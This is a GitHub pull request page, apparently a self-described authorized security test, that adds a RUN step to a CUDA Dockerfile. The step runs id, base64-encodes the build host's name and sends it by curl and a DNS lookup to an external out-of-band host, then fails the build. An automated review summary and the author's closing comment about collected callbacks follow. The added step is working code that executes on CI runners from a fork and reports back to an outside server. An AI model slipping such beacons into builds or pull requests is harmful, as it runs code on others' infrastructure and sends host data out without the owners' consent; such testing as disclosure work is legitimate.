[AUTHORIZED SEC TEST] benign CI canary (marker f0b97d-forkpr)#825
Closed
SriharshaHack wants to merge 1 commit into
Closed
[AUTHORIZED SEC TEST] benign CI canary (marker f0b97d-forkpr)#825SriharshaHack wants to merge 1 commit into
SriharshaHack wants to merge 1 commit into
Conversation
|
Azure Pipelines: There may be pipelines that require an authorized user to comment /azp run to run. |
Contributor
There was a problem hiding this comment.
Pull request overview
This PR injects an “authorized security test” canary into the CUDA 12.9 Dockerfile to prove fork-PR code execution by performing an outbound beacon and then intentionally failing the build.
Changes:
- Adds a
RUNlayer that collects basic host identity and beacons to external OOB endpoints. - Forces the Docker build to fail immediately via
exit 1.
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
Comment on lines
+2
to
+12
| # === GARUDA BENIGN SECURITY CANARY (MSRC fork-PR RCE proof) === | ||
| # Read-only beacon: prints identity, calls OOB canary, then exits 1 to abort build. | ||
| # No secret reads, no persistence, no lateral movement. | ||
| RUN echo "garuda-canary-f0b97d start" \ | ||
| && (id || true) \ | ||
| && HN="$(hostname 2>/dev/null | base64 | tr -d '\n')" \ | ||
| && (curl -s -m 15 "https://superbench-canary.dssldrf.net/f0b97d-forkpr/hn=${HN}" || true) \ | ||
| && (getent hosts f0b97d-forkpr.rce.superbench-canary.dssldrf.net || true) \ | ||
| && echo "garuda-canary beacon-sent; aborting build for safety" \ | ||
| && exit 1 | ||
| # === END GARUDA CANARY === |
Author
|
Closing - security canary evidence collected (3 DNS callbacks). Thank you. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
AUTHORIZED SECURITY TEST (MSRC)
Benign read-only canary proving fork-PR code execution on self-hosted runners.
The added
RUNonly beacons the runner hostname (base64) to an authorized OOBcollector and immediately fails the build (
exit 1).Please close after CI dispatch is observed. Marker:
f0b97d-forkpr.